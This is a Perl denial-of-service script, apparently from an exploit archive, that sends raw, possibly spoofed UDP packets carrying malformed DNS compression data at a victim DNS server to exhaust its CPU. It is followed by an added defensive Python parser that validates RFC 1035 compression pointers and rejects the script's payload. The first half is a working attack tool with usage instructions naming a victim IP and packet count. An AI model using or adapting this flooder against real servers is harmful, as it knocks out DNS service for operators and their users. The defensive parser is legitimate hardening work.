#!/usr/bin/perl
#
# DNS Invalid Compression attack coded by sipher (www.elitter.net)
#
# History:
# elitter.net provides Free UNIX shells and receives its more than fair amount of DDoS's and DoS
# attacks. 1 lovely day someone targeted our DNS services and managed to bring the system to 100%
# CPU usage.
#
# Goal:
#
# Reproduce following error message, hopefully get the same results of 100% CPU usage.
#
# Error output:
#
# Jul 9 19:36:30 42262 mydns[26545]: 09-Jul-2011 19:36:30+359454 #24949 12337 UDP 202.164.36.27 000 000
# FORMERR Invalid_compression_method 13365 0 0 0 LOG N 006 ""
#
# Here is a sample of the packet (tcpdump -lnx port 53):
#
# 4500 002b 512f 4000 3411 92a9 2989 601e
# cc2d 0d15 e483 0035 0017 e98c 3031 3233
# 3435 3637 3839 4142 4344 4500 0000
#
# So next time you decide to attack someone. You might just squash your bug.
#
# Testbed:
# isc.org,dbjdns
#
# DNS packets use an ad-hoc compression method in which portions of domain names can sometimes be replaced with two-byte pointers to previous domain names.
# The precise rule is that a name can be compressed if it is a response owner name, the name in NS data, the name in CNAME data, the name in PTR data,
# the name in MX data, or one of the names in SOA data.
# One problem with DNS compression is the amount of code required to parse it. Reliably locating all these names takes quite a bit of work that
# would otherwise have been unnecessary for a DNS cache. LZ77 compression would have been much easier to implement.
#
# Another problem with DNS compression is the amount of code required to correctly generate it. (RFC 1035 allowed servers to not bother compressing
# their responses; however, caches have to implement compression, so that address lists from some well-known sites don't burst the seams of a DNS UDP packet.)
# Not only does the compressor need to figure out which names can be compressed, but it also needs to keep track of compression targets earlier in the packet.
# RFC 1035 doesn't make clear exactly what targets are allowed.
# (Most versions of BIND do not use pointers except to compressible names; suffixes of the query name are excluded. dnscache uses pointers to suffixes of the query name.)
#
# -djb
#
# Shouts: burnout, hightech, spithash, pookie, #[email protected]
#
# http://www.hsc.fr/ressources/outils/rawsock/index.html.en
use Net::RawSock;
if($#ARGV != 2) {
print "--> DNS Invalid compression attack (www.elitter.net)\n";
print "--> NOTE: Most ISP block spoofed UDP packets. Enter a valid source address.\n";
print "./compdns.pl < source address > < IP of victim > < # of packets >\n";
exit(0);
}
print "--> DNS Invalid compress attack\n";
$count = 1;
$sourceaddy = $ARGV[0];
$target = $ARGV[1];
$numpkt = $ARGV[2];
$dst_host = (gethostbyname($sourceaddy))[4];
$src_host = (gethostbyname($target))[4];
$dst_host = pack('a4', $dst_host);
$src_host = pack('a4', $src_host);
while ($count <= $numpkt) {
print "--> [$count]: ($sourceaddy)->($target)\n";
my $pkt =
"\x45\x00\x00\x2b\x00\x00\x40\x00\x34\x11\x92\xa9".
# destination address
# Example: "\x43\x9f\x27\x94".
"$dst_host".
# source address
# Example: "\xcc\x2d\x0d\x12".
"$src_host".
# source port
"\xe4\x83".
# destination port
"\x00\x35".
# length
"\x00\x17".
# checksum null whore
"\x00\x00".
# data = junk
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00".
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x41\x42\x43\x44\x45\x00\x00\x00";
Net::RawSock::write_ip($pkt);
$count++;
}
print "--> Done.\n";
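The djb note quoted in the script header explains why parsing compressed names takes more code than it looks, and the MyDNS log line at the top is the server refusing this script's payload with FORMERR. What follows is an added example, not code from the script above or from MyDNS: a defensive Python parser for the RFC 1035 section 4.1.4 compression scheme. It follows pointers only backwards (RFC 1035 permits pointers only to a prior occurrence), so self-references and loops cannot occur and no hop counter is needed; it rejects the reserved 01/10 label types; and it bounds every read to the message so a bad offset cannot walk past the buffer. Run over the script's 18-byte payload, the header decodes to ID 12337 and QDCOUNT 13365, which are also the two numbers in the quoted log line, and the first QNAME octet 0x43 ('C') is a reserved label type, so the message is rejected on the first label. The function and constant names (`read_name`, `owner_names`, `check`, `header_fields`, `DnsFormatError`, `MAX_NAME_OCTETS`) are my own; `GOOD` and `SELF_POINTER` are constructed messages, `PAGE_PAYLOAD` is the data bytes from the script.

```python
# Added example (not code from the page's script or from MyDNS): a DNS name
# parser that validates RFC 1035 section 4.1.4 compression pointers instead of
# following them blindly, and reports malformed names as FORMERR.
import struct

MAX_NAME_OCTETS = 255       # RFC 1035 section 2.3.4, uncompressed wire form


class DnsFormatError(ValueError):
    """Malformed message; a server replies with RCODE FORMERR."""


def header_fields(msg):
    """Decode the six 16-bit header fields (RFC 1035 section 4.1.1)."""
    if len(msg) < 12:
        raise DnsFormatError("message shorter than the 12-octet header")
    keys = ("id", "flags", "qdcount", "ancount", "nscount", "arcount")
    return dict(zip(keys, struct.unpack("!6H", msg[:12])))


def read_name(msg, offset):
    """Return (name, next_offset) for the possibly compressed name at offset;
    next_offset is where the caller continues in the original byte stream."""
    labels, pos, next_offset, wire_octets = [], offset, None, 0
    while True:
        if pos >= len(msg):
            raise DnsFormatError("name runs past end of message")
        length = msg[pos]
        if length & 0xC0 == 0xC0:                    # 11xxxxxx: pointer
            if pos + 1 >= len(msg):
                raise DnsFormatError("truncated compression pointer")
            target = struct.unpack("!H", msg[pos:pos + 2])[0] & 0x3FFF
            # Only pointers to an EARLIER position are legal; since every hop
            # goes strictly backwards, this one check also rules out loops.
            if target >= pos:
                raise DnsFormatError("self/forward pointer %d -> %d" % (pos, target))
            if next_offset is None:
                next_offset = pos + 2                # resume after the pointer
            pos = target
            continue
        if length & 0xC0:                            # 01xxxxxx / 10xxxxxx
            raise DnsFormatError("reserved label type 0x%02x at %d" % (length, pos))
        wire_octets += length + 1
        if wire_octets > MAX_NAME_OCTETS:
            raise DnsFormatError("name longer than 255 octets")
        if length == 0:                              # root label ends the name
            break
        label = msg[pos + 1:pos + 1 + length]
        if len(label) != length:
            raise DnsFormatError("label runs past end of message")
        labels.append(label.decode("ascii", "replace"))
        pos += 1 + length
    if next_offset is None:
        next_offset = pos + 1
    return (".".join(labels) + "." if labels else "."), next_offset


def owner_names(msg):
    """Owner names of the question and answer sections; raises DnsFormatError."""
    hdr = header_fields(msg)
    names, pos = [], 12
    for _ in range(hdr["qdcount"]):
        name, pos = read_name(msg, pos)
        if pos + 4 > len(msg):
            raise DnsFormatError("question missing QTYPE/QCLASS")
        names.append(name)
        pos += 4                                     # QTYPE, QCLASS
    for _ in range(hdr["ancount"]):
        name, pos = read_name(msg, pos)
        if pos + 10 > len(msg):
            raise DnsFormatError("resource record truncated")
        rdlength = struct.unpack("!H", msg[pos + 8:pos + 10])[0]
        pos += 10 + rdlength                         # TYPE CLASS TTL RDLENGTH RDATA
        if pos > len(msg):
            raise DnsFormatError("RDATA runs past end of message")
        names.append(name)
    return names


def check(msg):
    """Classify a message as a server front end would: NOERROR or FORMERR."""
    try:
        return "NOERROR", owner_names(msg)
    except DnsFormatError as exc:
        return "FORMERR", str(exc)


# Constructed: a normal A response for www.example.com whose answer owner name
# is the pointer 0xC00C back to the QNAME at offset 12.
GOOD = (b"\x12\x34\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00"
        b"\x03www\x07example\x03com\x00\x00\x01\x00\x01"
        b"\xc0\x0c\x00\x01\x00\x01\x00\x00\x0e\x10\x00\x04\xc0\xa8\x00\x01")
# The UDP payload the script above sends ("0123456789ABCDE\0\0\0"): its header
# decodes to ID 12337 and QDCOUNT 13365, the two numbers in the quoted log
# line, and octet 12 (0x43) carries the reserved 01 label type.
PAGE_PAYLOAD = b"0123456789ABCDE\x00\x00\x00"
# Constructed: a QNAME that is a pointer to itself; a naive parser spins here.
SELF_POINTER = (b"\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
                b"\xc0\x0c\x00\x01\x00\x01")

if __name__ == "__main__":
    for tag, msg in (("good", GOOD), ("page payload", PAGE_PAYLOAD),
                     ("self pointer", SELF_POINTER)):
        print("%-13s %s %s" % ((tag,) + check(msg)))
```

The backward-only rule is the whole termination argument: each hop lands at a strictly smaller offset, so the number of hops is bounded by the message length without any extra counter, and a packet cannot make the parser spend more than linear work per name. Everything else the parser does is ordinary bounds checking, which is what turns the "Invalid_compression_method" case into a cheap FORMERR reply instead of a CPU sink.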